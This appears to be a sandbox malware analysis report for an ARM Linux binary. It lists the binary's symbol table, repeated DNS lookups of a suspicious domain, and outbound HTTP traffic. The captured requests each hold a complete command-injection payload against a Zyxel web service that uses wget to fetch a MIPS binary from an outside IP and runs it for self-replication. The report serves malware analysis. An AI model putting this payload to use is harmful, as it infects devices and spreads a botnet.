                                    __GI_memmove.symtab0x1a2604FUNC<unknown>HIDDEN2
                                    __GI_mempcpy.symtab0x1a39036FUNC<unknown>HIDDEN2
                                    __GI_memrchr.symtab0x20d50224FUNC<unknown>HIDDEN2
                                    __GI_memset.symtab0x1a270156FUNC<unknown>HIDDEN2
                                    __GI_mmap.symtab0x16de4124FUNC<unknown>HIDDEN2
                                    __GI_mremap.symtab0x1f03468FUNC<unknown>HIDDEN2
                                    __GI_munmap.symtab0x172e064FUNC<unknown>HIDDEN2
                                    __GI_nanosleep.symtab0x1736096FUNC<unknown>HIDDEN2
                                    __GI_open.symtab0x1db80100FUNC<unknown>HIDDEN2
                                    __GI_opendir.symtab0x17b2c196FUNC<unknown>HIDDEN2
                                    __GI_raise.symtab0x1d9a0240FUNC<unknown>HIDDEN2
                                    __GI_random.symtab0x1c2a4164FUNC<unknown>HIDDEN2
                                    __GI_random_r.symtab0x1c564144FUNC<unknown>HIDDEN2
                                    __GI_rawmemchr.symtab0x21890176FUNC<unknown>HIDDEN2
                                    __GI_read.symtab0x1dca0100FUNC<unknown>HIDDEN2
                                    __GI_readdir.symtab0x17ca0232FUNC<unknown>HIDDEN2
                                    __GI_readdir64.symtab0x1f138236FUNC<unknown>HIDDEN2
                                    __GI_readlink.symtab0x1740464FUNC<unknown>HIDDEN2
                                    __GI_recv.symtab0x1aa80112FUNC<unknown>HIDDEN2
                                    __GI_recvfrom.symtab0x1ab38136FUNC<unknown>HIDDEN2
                                    __GI_remove.symtab0x1810c100FUNC<unknown>HIDDEN2
                                    __GI_rmdir.symtab0x1f07864FUNC<unknown>HIDDEN2
                                    __GI_sbrk.symtab0x1f0b8108FUNC<unknown>HIDDEN2
                                    __GI_select.symtab0x175b0132FUNC<unknown>HIDDEN2
                                    __GI_send.symtab0x1ac04112FUNC<unknown>HIDDEN2
                                    __GI_sendto.symtab0x1acc0136FUNC<unknown>HIDDEN2
                                    __GI_setsid.symtab0x1763464FUNC<unknown>HIDDEN2
                                    __GI_setsockopt.symtab0x1ad4872FUNC<unknown>HIDDEN2
                                    __GI_setstate_r.symtab0x1c7c4236FUNC<unknown>HIDDEN2
                                    __GI_sigaction.symtab0x16e60136FUNC<unknown>HIDDEN2
                                    __GI_sigprocmask.symtab0x17674140FUNC<unknown>HIDDEN2
                                    __GI_snprintf.symtab0x1817048FUNC<unknown>HIDDEN2
                                    __GI_socket.symtab0x1ad9068FUNC<unknown>HIDDEN2
                                    __GI_sprintf.symtab0x181a052FUNC<unknown>HIDDEN2
                                    __GI_srandom_r.symtab0x1c5f4216FUNC<unknown>HIDDEN2
                                    __GI_stat.symtab0x17700100FUNC<unknown>HIDDEN2
                                    __GI_strchr.symtab0x20e30240FUNC<unknown>HIDDEN2
                                    __GI_strchrnul.symtab0x20f20236FUNC<unknown>HIDDEN2
                                    __GI_strcmp.symtab0x1a31028FUNC<unknown>HIDDEN2
                                    __GI_strcoll.symtab0x1a31028FUNC<unknown>HIDDEN2
                                    __GI_strcpy.symtab0x1a3b436FUNC<unknown>HIDDEN2
                                    __GI_strcspn.symtab0x2100c68FUNC<unknown>HIDDEN2
                                    __GI_strlen.symtab0x1a33096FUNC<unknown>HIDDEN2
                                    __GI_strnlen.symtab0x1a3d8204FUNC<unknown>HIDDEN2
                                    __GI_strpbrk.symtab0x2116464FUNC<unknown>HIDDEN2
                                    __GI_strrchr.symtab0x2105080FUNC<unknown>HIDDEN2
                                    __GI_strspn.symtab0x210a076FUNC<unknown>HIDDEN2
                                    __GI_strstr.symtab0x1a4a4252FUNC<unknown>HIDDEN2
                                    __GI_strtok.symtab0x1a6c448FUNC<unknown>HIDDEN2
                                    __GI_strtok_r.symtab0x210ec120FUNC<unknown>HIDDEN2
                                    __GI_strtol.symtab0x1c8d028FUNC<unknown>HIDDEN2
                                    __GI_sysconf.symtab0x1ccd41572FUNC<unknown>HIDDEN2
                                    __GI_tcgetattr.symtab0x1a718124FUNC<unknown>HIDDEN2
                                    __GI_time.symtab0x1776448FUNC<unknown>HIDDEN2
                                    __GI_times.symtab0x1f12420FUNC<unknown>HIDDEN2
                                    __GI_unlink.symtab0x1779464FUNC<unknown>HIDDEN2
                                    __GI_vfprintf.symtab0x20414324FUNC<unknown>HIDDEN2
                                    __GI_vsnprintf.symtab0x181d4208FUNC<unknown>HIDDEN2
                                    __GI_wcrtomb.symtab0x1f5c884FUNC<unknown>HIDDEN2
                                    __GI_wcsnrtombs.symtab0x1f640188FUNC<unknown>HIDDEN2
                                    __GI_wcsrtombs.symtab0x1f61c36FUNC<unknown>HIDDEN2
                                    __GI_write.symtab0x1dc10100FUNC<unknown>HIDDEN2
                                    __JCR_END__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                    __JCR_LIST__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                    ___Unwind_ForcedUnwind.symtab0x165ec36FUNC<unknown>HIDDEN2
                                    ___Unwind_RaiseException.symtab0x1658036FUNC<unknown>HIDDEN2
                                    ___Unwind_Resume.symtab0x165a436FUNC<unknown>HIDDEN2
                                    ___Unwind_Resume_or_Rethrow.symtab0x165c836FUNC<unknown>HIDDEN2
                                    __adddf3.symtab0x219bc784FUNC<unknown>HIDDEN2
                                    __aeabi_cdcmpeq.symtab0x2231824FUNC<unknown>HIDDEN2
                                    __aeabi_cdcmple.symtab0x2231824FUNC<unknown>HIDDEN2
                                    __aeabi_cdrcmple.symtab0x222fc52FUNC<unknown>HIDDEN2
                                    __aeabi_d2uiz.symtab0x223a884FUNC<unknown>HIDDEN2
                                    __aeabi_dadd.symtab0x219bc784FUNC<unknown>HIDDEN2
                                    __aeabi_dcmpeq.symtab0x2233024FUNC<unknown>HIDDEN2
                                    __aeabi_dcmpge.symtab0x2237824FUNC<unknown>HIDDEN2
                                    __aeabi_dcmpgt.symtab0x2239024FUNC<unknown>HIDDEN2
                                    __aeabi_dcmple.symtab0x2236024FUNC<unknown>HIDDEN2
                                    __aeabi_dcmplt.symtab0x2234824FUNC<unknown>HIDDEN2
                                    __aeabi_ddiv.symtab0x2205c524FUNC<unknown>HIDDEN2
                                    __aeabi_dmul.symtab0x21dcc656FUNC<unknown>HIDDEN2
                                    __aeabi_drsub.symtab0x219b00FUNC<unknown>HIDDEN2
                                    __aeabi_dsub.symtab0x219b8788FUNC<unknown>HIDDEN2
                                    __aeabi_f2d.symtab0x21d1864FUNC<unknown>HIDDEN2
                                    __aeabi_i2d.symtab0x21cf040FUNC<unknown>HIDDEN2
                                    __aeabi_idiv.symtab0x157400FUNC<unknown>HIDDEN2
                                    __aeabi_idivmod.symtab0x1586c24FUNC<unknown>HIDDEN2
                                    __aeabi_l2d.symtab0x21d6c96FUNC<unknown>HIDDEN2
                                    __aeabi_read_tp.symtab0x111808FUNC<unknown>HIDDEN2
                                    __aeabi_ui2d.symtab0x21ccc36FUNC<unknown>HIDDEN2
                                    __aeabi_uidiv.symtab0x1562c0FUNC<unknown>HIDDEN2
                                    __aeabi_uidivmod.symtab0x1572824FUNC<unknown>HIDDEN2
                                    __aeabi_ul2d.symtab0x21d58116FUNC<unknown>HIDDEN2
                                    __aeabi_unwind_cpp_pr0.symtab0x1654c8FUNC<unknown>HIDDEN2
                                    __aeabi_unwind_cpp_pr1.symtab0x165448FUNC<unknown>HIDDEN2
                                    __aeabi_unwind_cpp_pr2.symtab0x1653c8FUNC<unknown>HIDDEN2
                                    __app_fini.symtab0x321a44OBJECT<unknown>HIDDEN15
                                    __atexit_lock.symtab0x2d3a424OBJECT<unknown>DEFAULT14
                                    __bss_end__.symtab0x326300NOTYPE<unknown>DEFAULTSHN_ABS
                                    __bss_start.symtab0x2d3d40NOTYPE<unknown>DEFAULTSHN_ABS
                                    __bss_start__.symtab0x2d3d40NOTYPE<unknown>DEFAULTSHN_ABS
                                    __check_one_fd.symtab0x1e8f084FUNC<unknown>DEFAULT2
                                    __clone.symtab0x1d2f8100FUNC<unknown>DEFAULT2
                                    __close.symtab0x1daf0100FUNC<unknown>DEFAULT2
                                    __close_nocancel.symtab0x1dad424FUNC<unknown>DEFAULT2
                                    __cmpdf2.symtab0x22278132FUNC<unknown>HIDDEN2
                                    __ctype_b.symtab0x2d3d04OBJECT<unknown>DEFAULT14
                                    __curbrk.symtab0x321ac4OBJECT<unknown>HIDDEN15
                                    __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __data_start.symtab0x2d0d40NOTYPE<unknown>DEFAULT14
                                    __deallocate_stack.symtab0x11c9c304FUNC<unknown>HIDDEN2
                                    __default_rt_sa_restorer.symtab0x16f000FUNC<unknown>DEFAULT2
                                    __default_sa_restorer.symtab0x16ef40FUNC<unknown>DEFAULT2
                                    __default_stacksize.symtab0x2d1d04OBJECT<unknown>HIDDEN14
                                    __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __div0.symtab0x1588420FUNC<unknown>HIDDEN2
                                    __divdf3.symtab0x2205c524FUNC<unknown>HIDDEN2
                                    __divsi3.symtab0x15740300FUNC<unknown>HIDDEN2
                                    __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                                    __do_global_dtors_aux_fini_array_entry.symtab0x2d00c0OBJECT<unknown>DEFAULT11
                                    __end__.symtab0x326300NOTYPE<unknown>DEFAULTSHN_ABS
                                    __environ.symtab0x3219c4OBJECT<unknown>DEFAULT15
                                    __eqdf2.symtab0x22278132FUNC<unknown>HIDDEN2
                                    __errno_location.symtab0x111dc32FUNC<unknown>DEFAULT2
                                    __error.symtab0x1d3580NOTYPE<unknown>DEFAULT2
                                    __exidx_end.symtab0x24c580NOTYPE<unknown>DEFAULTSHN_ABS
                                    __exidx_start.symtab0x24ae80NOTYPE<unknown>DEFAULTSHN_ABS
                                    __exit_cleanup.symtab0x317104OBJECT<unknown>HIDDEN15
                                    __extendsfdf2.symtab0x21d1864FUNC<unknown>HIDDEN2
                                    __fcntl_nocancel.symtab0x16f08152FUNC<unknown>DEFAULT2
                                    __fgetc_unlocked.symtab0x2069c300FUNC<unknown>DEFAULT2
                                    __find_in_stack_list.symtab0x11490308FUNC<unknown>HIDDEN2
                                    __fini_array_end.symtab0x2d0100NOTYPE<unknown>HIDDEN11
                                    __fini_array_start.symtab0x2d00c0NOTYPE<unknown>HIDDEN11
                                    __fixunsdfsi.symtab0x223a884FUNC<unknown>HIDDEN2
                                    __floatdidf.symtab0x21d6c96FUNC<unknown>HIDDEN2
                                    __floatsidf.symtab0x21cf040FUNC<unknown>HIDDEN2
                                    __floatundidf.symtab0x21d58116FUNC<unknown>HIDDEN2
                                    __floatunsidf.symtab0x21ccc36FUNC<unknown>HIDDEN2
                                    __fork.symtab0x1104c24FUNC<unknown>DEFAULT2
                                    __fork_generation.symtab0x322204OBJECT<unknown>HIDDEN15
                                    __fork_generation_pointer.symtab0x325fc4OBJECT<unknown>HIDDEN15
                                    __fork_handlers.symtab0x326004OBJECT<unknown>HIDDEN15
                                    __fork_lock.symtab0x317144OBJECT<unknown>HIDDEN15
                                    __frame_dummy_init_array_entry.symtab0x2d0080OBJECT<unknown>DEFAULT10
                                    __free_stacks.symtab0x11bf8164FUNC<unknown>HIDDEN2
                                    __free_tcb.symtab0x11dcc116FUNC<unknown>HIDDEN2
                                    __gedf2.symtab0x22268148FUNC<unknown>HIDDEN2
                                    __getdents.symtab0x1ee38160FUNC<unknown>HIDDEN2
                                    __getdents64.symtab0x21334328FUNC<unknown>HIDDEN2
                                    __getpagesize.symtab0x1713c40FUNC<unknown>DEFAULT2
                                    __getpid.symtab0x1d95872FUNC<unknown>DEFAULT2
                                    __glibc_strerror_r.symtab0x1a5a024FUNC<unknown>DEFAULT2
                                    __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                    __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __gnu_Unwind_ForcedUnwind.symtab0x15cf028FUNC<unknown>HIDDEN2
                                    __gnu_Unwind_RaiseException.symtab0x15dd8184FUNC<unknown>HIDDEN2
                                    __gnu_Unwind_Restore_VFP.symtab0x165700FUNC<unknown>HIDDEN2
                                    __gnu_Unwind_Resume.symtab0x15d6c108FUNC<unknown>HIDDEN2
                                    __gnu_Unwind_Resume_or_Rethrow.symtab0x15e9032FUNC<unknown>HIDDEN2
                                    __gnu_Unwind_Save_VFP.symtab0x165780FUNC<unknown>HIDDEN2
                                    __gnu_unwind_execute.symtab0x166541812FUNC<unknown>HIDDEN2
                                    __gnu_unwind_frame.symtab0x16d6872FUNC<unknown>HIDDEN2
                                    __gnu_unwind_pr_common.symtab0x15ff41352FUNC<unknown>DEFAULT2
                                    __gtdf2.symtab0x22268148FUNC<unknown>HIDDEN2
                                    __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __init_array_end.symtab0x2d00c0NOTYPE<unknown>HIDDEN10
                                    __init_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN10
                                    __init_sched_fifo_prio.symtab0x14a9476FUNC<unknown>HIDDEN2
                                    __is_smp.symtab0x322184OBJECT<unknown>HIDDEN15
                                    __ledf2.symtab0x22270140FUNC<unknown>HIDDEN2
                                    __libc_accept.symtab0x1a800116FUNC<unknown>DEFAULT2
                                    __libc_close.symtab0x1daf0100FUNC<unknown>DEFAULT2
                                    __libc_connect.symtab0x1a8fc116FUNC<unknown>DEFAULT2
                                    __libc_disable_asynccancel.symtab0x1dd10136FUNC<unknown>HIDDEN2
                                    __libc_enable_asynccancel.symtab0x1dd98220FUNC<unknown>HIDDEN2
                                    __libc_errno.symtab0x44TLS<unknown>HIDDEN9
                                    __libc_fcntl.symtab0x16fa0244FUNC<unknown>DEFAULT2
                                    __libc_fork.symtab0x1d35c972FUNC<unknown>DEFAULT2
                                    __libc_h_errno.symtab0x84TLS<unknown>HIDDEN9
                                    __libc_longjmp.symtab0x1722856FUNC<unknown>DEFAULT2
                                    __libc_multiple_threads.symtab0x326044OBJECT<unknown>HIDDEN15
                                    __libc_multiple_threads_ptr.symtab0x322144OBJECT<unknown>HIDDEN15
                                    __libc_nanosleep.symtab0x1736096FUNC<unknown>DEFAULT2
                                    __libc_open.symtab0x1db80100FUNC<unknown>DEFAULT2
                                    __libc_pthread_init.symtab0x1d72868FUNC<unknown>DEFAULT2
                                    __libc_read.symtab0x1dca0100FUNC<unknown>DEFAULT2
                                    __libc_recv.symtab0x1aa80112FUNC<unknown>DEFAULT2
                                    __libc_recvfrom.symtab0x1ab38136FUNC<unknown>DEFAULT2
                                    __libc_resp.symtab0x04TLS<unknown>HIDDEN8
                                    __libc_select.symtab0x175b0132FUNC<unknown>DEFAULT2
                                    __libc_send.symtab0x1ac04112FUNC<unknown>DEFAULT2
                                    __libc_sendto.symtab0x1acc0136FUNC<unknown>DEFAULT2
                                    __libc_setup_tls.symtab0x1df78560FUNC<unknown>DEFAULT2
                                    __libc_sigaction.symtab0x16e60136FUNC<unknown>DEFAULT2
                                    __libc_siglongjmp.symtab0x1722856FUNC<unknown>DEFAULT2
                                    __libc_stack_end.symtab0x321984OBJECT<unknown>DEFAULT15
                                    __libc_write.symtab0x1dc10100FUNC<unknown>DEFAULT2
                                    __linkin_atfork.symtab0x1d76c100FUNC<unknown>HIDDEN2
                                    __lll_lock_wait.symtab0x1448c156FUNC<unknown>HIDDEN2
                                    __lll_lock_wait_private.symtab0x143f4152FUNC<unknown>HIDDEN2
                                    __lll_robust_lock_wait.symtab0x1487c208FUNC<unknown>HIDDEN2
                                    __lll_robust_timedlock_wait.symtab0x14730332FUNC<unknown>HIDDEN2
                                    __lll_timedlock_wait.symtab0x14600304FUNC<unknown>HIDDEN2
                                    __lll_timedwait_tid.symtab0x14528216FUNC<unknown>HIDDEN2
                                    __longjmp.symtab0x1edb420FUNC<unknown>DEFAULT2
                                    __ltdf2.symtab0x22270140FUNC<unknown>HIDDEN2
                                    __make_stacks_executable.symtab0x11abc8FUNC<unknown>HIDDEN2
                                    __malloc_consolidate.symtab0x1bd34436FUNC<unknown>HIDDEN2
                                    __malloc_largebin_index.symtab0x1add4120FUNC<unknown>DEFAULT2
                                    __malloc_lock.symtab0x2d2c824OBJECT<unknown>DEFAULT14
                                    __malloc_state.symtab0x32284888OBJECT<unknown>DEFAULT15
                                    __malloc_trim.symtab0x1bc84176FUNC<unknown>DEFAULT2
                                    __muldf3.symtab0x21dcc656FUNC<unknown>HIDDEN2
                                    __nedf2.symtab0x22278132FUNC<unknown>HIDDEN2
                                    __nptl_create_event.symtab0x150e84FUNC<unknown>DEFAULT2
                                    __nptl_deallocate_tsd.symtab0x11ac4308FUNC<unknown>HIDDEN2
                                    __nptl_death_event.symtab0x150ec4FUNC<unknown>DEFAULT2
                                    __nptl_initial_report_events.symtab0x2f5041OBJECT<unknown>DEFAULT15
                                    __nptl_last_event.symtab0x2d4f44OBJECT<unknown>DEFAULT15
                                    __nptl_nthreads.symtab0x2d1bc4OBJECT<unknown>DEFAULT14
                                    __nptl_setxid.symtab0x117c4688FUNC<unknown>HIDDEN2
                                    __nptl_threads_events.symtab0x2d4ec8OBJECT<unknown>DEFAULT15
                                    __open.symtab0x1db80100FUNC<unknown>DEFAULT2
                                    __open_nocancel.symtab0x1db6424FUNC<unknown>DEFAULT2
                                    __pagesize.symtab0x321a04OBJECT<unknown>DEFAULT15
                                    __preinit_array_end.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                    __preinit_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                    __progname.symtab0x2d3c44OBJECT<unknown>DEFAULT14
                                    __progname_full.symtab0x2d3c84OBJECT<unknown>DEFAULT14
                                    __pthread_cleanup_pop.symtab0x14f1c56FUNC<unknown>HIDDEN2
                                    __pthread_cleanup_pop_restore.symtab0x14ff8240FUNC<unknown>DEFAULT2
                                    __pthread_cleanup_push.symtab0x14f5440FUNC<unknown>HIDDEN2
                                    __pthread_cleanup_push_defer.symtab0x14f7c124FUNC<unknown>DEFAULT2
                                    __pthread_create_2_1.symtab0x1248c2692FUNC<unknown>DEFAULT2
                                    __pthread_current_priority.symtab0x14954320FUNC<unknown>HIDDEN2
                                    __pthread_debug.symtab0x322104OBJECT<unknown>HIDDEN15
                                    __pthread_disable_asynccancel.symtab0x14dcc136FUNC<unknown>HIDDEN2
                                    __pthread_enable_asynccancel.symtab0x14e54200FUNC<unknown>HIDDEN2
                                    __pthread_init_static_tls.symtab0x12f10412FUNC<unknown>HIDDEN2
                                    __pthread_initialize_minimal.symtab0x1533c752FUNC<unknown>DEFAULT2
                                    __pthread_initialize_minimal_internal.symtab0x1533c752FUNC<unknown>HIDDEN2
                                    __pthread_keys.symtab0x2d5008192OBJECT<unknown>DEFAULT15
                                    __pthread_multiple_threads.symtab0x3221c4OBJECT<unknown>HIDDEN15
                                    __pthread_mutex_lock.symtab0x13a10576FUNC<unknown>PROTECTED2
                                    __pthread_mutex_lock_full.symtab0x1345c1460FUNC<unknown>DEFAULT2
                                    __pthread_mutex_lock_internal.symtab0x13a10576FUNC<unknown>HIDDEN2
                                    __pthread_mutex_unlock.symtab0x1425c8FUNC<unknown>PROTECTED2
                                    __pthread_mutex_unlock_full.symtab0x13c501264FUNC<unknown>DEFAULT2
                                    __pthread_mutex_unlock_internal.symtab0x1425c8FUNC<unknown>HIDDEN2
                                    __pthread_mutex_unlock_usercnt.symtab0x14140284FUNC<unknown>HIDDEN2
                                    __pthread_return_0.symtab0x1e8308FUNC<unknown>DEFAULT2
                                    __pthread_tpp_change_priority.symtab0x14ae0748FUNC<unknown>HIDDEN2
                                    __pthread_unwind.symtab0x1426484FUNC<unknown>DEFAULT2
                                    __pthread_unwind_next.symtab0x142b816FUNC<unknown>DEFAULT2
                                    __read.symtab0x1dca0100FUNC<unknown>DEFAULT2
                                    __read_nocancel.symtab0x1dc8424FUNC<unknown>DEFAULT2
                                    __reclaim_stacks.symtab0x130ac548FUNC<unknown>HIDDEN2
                                    __register_atfork.symtab0x1d7d0392FUNC<unknown>DEFAULT2
                                    __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __resp.symtab0x04TLS<unknown>DEFAULT8
                                    __restore_core_regs.symtab0x1655428FUNC<unknown>HIDDEN2
                                    __rtld_fini.symtab0x321a84OBJECT<unknown>HIDDEN15
                                    __sched_fifo_max_prio.symtab0x2d1d84OBJECT<unknown>HIDDEN14
                                    __sched_fifo_min_prio.symtab0x2d1d44OBJECT<unknown>HIDDEN14
                                    __set_robust_list_avail.symtab0x3222c4OBJECT<unknown>HIDDEN15
                                    __sigaction.symtab0x1119076FUNC<unknown>DEFAULT2
                                    __sigjmp_save.symtab0x2129c64FUNC<unknown>HIDDEN2
                                    __sigsetjmp.symtab0x1edc812FUNC<unknown>DEFAULT2
                                    __stack_user.symtab0x2d4e08OBJECT<unknown>DEFAULT15
                                    __static_tls_align_m1.symtab0x322244OBJECT<unknown>HIDDEN15
                                    __static_tls_size.symtab0x322284OBJECT<unknown>HIDDEN15
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 13, 2024 19:01:48.567502022 CET192.168.2.138.8.8.80xbe58Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:01:52.084197998 CET192.168.2.138.8.8.80x9a5eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:01:54.595191002 CET192.168.2.138.8.8.80xe8fdStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:05.098068953 CET192.168.2.138.8.8.80xe190Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:17.654028893 CET192.168.2.138.8.8.80x77afStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:27.162774086 CET192.168.2.138.8.8.80x6c22Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:38.675760031 CET192.168.2.138.8.8.80x7de8Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:46.200721025 CET192.168.2.138.8.8.80x3466Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:56.822628021 CET192.168.2.138.8.8.80xe68aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:58.321615934 CET192.168.2.138.8.8.80xaeb0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:06.849560976 CET192.168.2.138.8.8.80x4393Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:09.353513002 CET192.168.2.138.8.8.80x1324Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:14.878917933 CET192.168.2.138.8.8.80x5214Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:17.388307095 CET192.168.2.138.8.8.80xafb2Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:21.911936998 CET192.168.2.138.8.8.80x6f74Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:30.434401035 CET192.168.2.138.8.8.80xacd3Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:40.938688993 CET192.168.2.138.8.8.80x70afStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:51.444856882 CET192.168.2.138.8.8.80x5083Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 13, 2024 19:01:48.669565916 CET8.8.8.8192.168.2.130xbe58No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:01:52.185594082 CET8.8.8.8192.168.2.130x9a5eNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:01:54.700620890 CET8.8.8.8192.168.2.130xe8fdNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:05.201421976 CET8.8.8.8192.168.2.130xe190No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:17.755884886 CET8.8.8.8192.168.2.130x77afNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:27.264621973 CET8.8.8.8192.168.2.130x6c22No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:38.787977934 CET8.8.8.8192.168.2.130x7de8No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:46.302512884 CET8.8.8.8192.168.2.130x3466No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:56.922914982 CET8.8.8.8192.168.2.130xe68aNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:02:58.428369999 CET8.8.8.8192.168.2.130xaeb0No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:06.950380087 CET8.8.8.8192.168.2.130x4393No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:09.455220938 CET8.8.8.8192.168.2.130x1324No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:14.978843927 CET8.8.8.8192.168.2.130x5214No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:17.491200924 CET8.8.8.8192.168.2.130xafb2No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:22.019587994 CET8.8.8.8192.168.2.130x6f74No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:30.537056923 CET8.8.8.8192.168.2.130xacd3No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:41.040216923 CET8.8.8.8192.168.2.130x70afNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Jan 13, 2024 19:03:51.546772003 CET8.8.8.8192.168.2.130x5083No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                    Session IDSource IPSource PortDestination IPDestination Port
                                    0192.168.2.1342848208.127.171.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604513884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1192.168.2.1338952212.229.52.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604646921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2192.168.2.134960466.115.89.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604733944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3192.168.2.133340034.122.219.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604789972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4192.168.2.1350454118.215.39.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604804993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5192.168.2.1338132105.192.44.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.604818106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


